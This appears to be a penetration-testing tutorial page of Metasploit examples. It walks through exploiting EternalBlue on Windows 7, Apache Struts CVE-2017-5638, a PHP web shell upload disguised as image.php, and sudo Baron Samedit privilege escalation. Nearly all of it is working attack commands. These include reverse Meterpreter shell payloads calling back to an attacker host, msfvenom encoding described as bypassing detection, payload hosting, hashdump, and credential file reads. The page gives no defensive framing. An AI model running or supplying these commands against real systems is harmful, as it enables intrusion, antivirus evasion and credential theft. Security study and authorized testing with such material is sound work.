Skip to content

06. Metasploit More Examples

1. Exploiting a Windows SMB Vulnerability (MS17-010 - EternalBlue)

Scenario:

Target: Windows 7 SP1 (x64) with SMB service enabled.

Steps:

  1. Search for Exploit:

    search eternalblue

  2. Load the Exploit:

    use exploit/windows/smb/ms17_010_eternalblue

  3. Set Target Options:

    set RHOST 192.168.1.100    # Target IP
set RPORT 445              # Default SMB port

  4. Set Payload: Use a reverse Meterpreter shell:

    set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10     # Your attacking machine IP
set LPORT 4444             # Listening port

  5. Exploit:

    exploit

  6. Post-Exploitation:

    • Interact with Meterpreter:

      sessions -i 1  # Assuming session ID is 1

    • Gather system info:

      sysinfo

    • Dump hashes:

      hashdump

2. Customizing Payloads

Metasploit provides flexibility to generate and modify payloads for various scenarios.

Reverse Shell with Payload Encoding

  1. Generate a Reverse Shell Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe

  2. Encode Payload to Bypass Detection:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 3 -o encoded_shell.exe
    • -e x86/shikata_ga_nai: Encoding mechanism.
    • -i 3: Number of iterations to apply encoding.
    • Serve the Payload: Use a simple HTTP server to host the payload:
    python3 -m http.server 8080

  3. Execute on Target: Download and execute encoded_shell.exe on the target.

3. Exploiting Apache Struts CVE-2017-5638

Scenario:

Target: A vulnerable Apache Struts server.

Steps:

  1. Search for Exploit:

    search struts2

  2. Load the Exploit:

    use exploit/multi/http/struts2_content_type_ognl

  3. Set Target Options:

    set RHOST 192.168.1.200    # Target server IP
set RPORT 8080             # Port Apache Struts is running on
set TARGETURI /struts2-showcase/index.action

  4. Set Payload:

    set payload java/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

  5. Run Exploit:

    exploit

  6. Post-Exploitation:

    • Check the current user:

      getuid

    • Elevate privileges:

      getsystem

4. Custom Exploit: PHP Web Shell Injection

Scenario:

You have access to upload files to a vulnerable web server.

Steps:

  1. Generate a PHP Reverse Shell:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell.php

  2. Rename Payload: Rename shell.php to blend in with the environment, e.g., image.php.

  3. Upload the Payload:

    • Use a vulnerable file upload mechanism to upload the payload.
    • Set Up Metasploit Listener:
    use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

  4. Trigger the Payload: Access the uploaded PHP shell via a browser:

    http://192.168.1.200/uploads/image.php

  5. Post-Exploitation:

    • Dump credentials:

      cat /etc/passwd

    • Escalate privileges:

      sudo -l

5. Exploiting Linux System with a Local Privilege Escalation

Scenario:

Exploit CVE-2021-3156 (Sudo Heap Overflow).

Steps:

  1. Search and Load Exploit:

    search sudo
use exploit/linux/local/sudo_baron_samedit

  2. Set Target Details:

    set SESSION 1     # Use active session ID

  3. Run Exploit:

    exploit

  4. Verify Privilege Escalation: Check user privileges:

    id